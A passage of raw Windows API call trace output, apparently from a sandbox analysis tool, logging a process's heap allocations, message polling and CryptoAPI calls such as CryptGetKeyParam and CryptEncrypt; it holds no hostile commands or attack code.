hHeap=0x8a0000) returned 1 [0180.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0180.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0180.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0180.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0180.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0180.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0180.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0180.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0180.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0180.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0180.497] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0180.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x11) returned 0x90d440 [0180.497] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x90d440, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0180.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0180.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0180.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0180.498] GetProcAddress (hModule=0x74f20000, lpProcName="CryptGetKeyParam") returned 0x74f477cb [0180.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0180.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0180.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0180.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0180.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0180.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0180.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0180.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0180.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0180.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0180.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0180.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0180.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0180.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0180.498] CryptGetKeyParam (in: hKey=0x90aed8, dwParam=0x7, pbData=0x9c2888, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2888*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0180.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0180.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0180.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0180.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0180.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0180.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0180.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0180.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0180.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0180.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0180.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0180.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0180.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0180.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0180.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0180.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0180.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0180.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0180.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0180.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0180.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0180.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0180.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0180.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0180.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0180.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0180.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0180.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0180.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0180.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0180.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0180.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0180.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0180.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0180.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0180.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0180.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0180.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0180.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0180.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0180.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0180.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0180.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0180.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0180.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0180.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0180.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0180.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0180.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0180.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0180.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0180.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0180.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0180.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0180.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0180.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0180.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0180.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0180.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0180.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0180.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0180.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0180.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0180.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0180.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0180.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0180.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0180.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0180.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0180.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0180.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0180.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0180.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0180.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0180.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0180.502] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0180.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0180.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0180.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0180.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0180.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0180.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0180.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0180.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d460 [0180.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0180.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0180.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0180.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0180.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0180.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0180.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b058 [0180.503] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0180.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0180.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0180.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0180.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0180.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d460 [0180.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0180.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0180.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0180.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0180.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0180.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0180.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0180.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0180.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0180.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0180.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0180.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0180.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0180.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0180.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0180.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0180.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0180.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0180.504] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0180.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0180.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0180.504] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0180.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0180.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0180.504] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.504] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.504] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0180.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0180.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0180.504] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0180.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df050 [0180.505] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0180.505] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0180.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0180.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0180.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0180.505] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0180.505] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0180.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0180.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0180.505] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0180.505] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0180.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0180.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0180.518] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0180.518] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0180.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0180.518] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0180.518] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0180.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0180.518] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0180.518] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0180.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0180.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0180.518] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.518] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0180.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df050 [0180.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0180.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0180.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0180.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0180.519] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0180.519] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0180.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0180.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0180.519] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0180.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0180.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0180.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0180.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0180.520] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x143af, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x143b0) returned 1 [0180.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0180.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0180.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0f0 [0180.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0180.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0180.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0180.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0180.520] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0180.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0180.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0180.520] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.520] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0180.520] RtlAllocateHeap 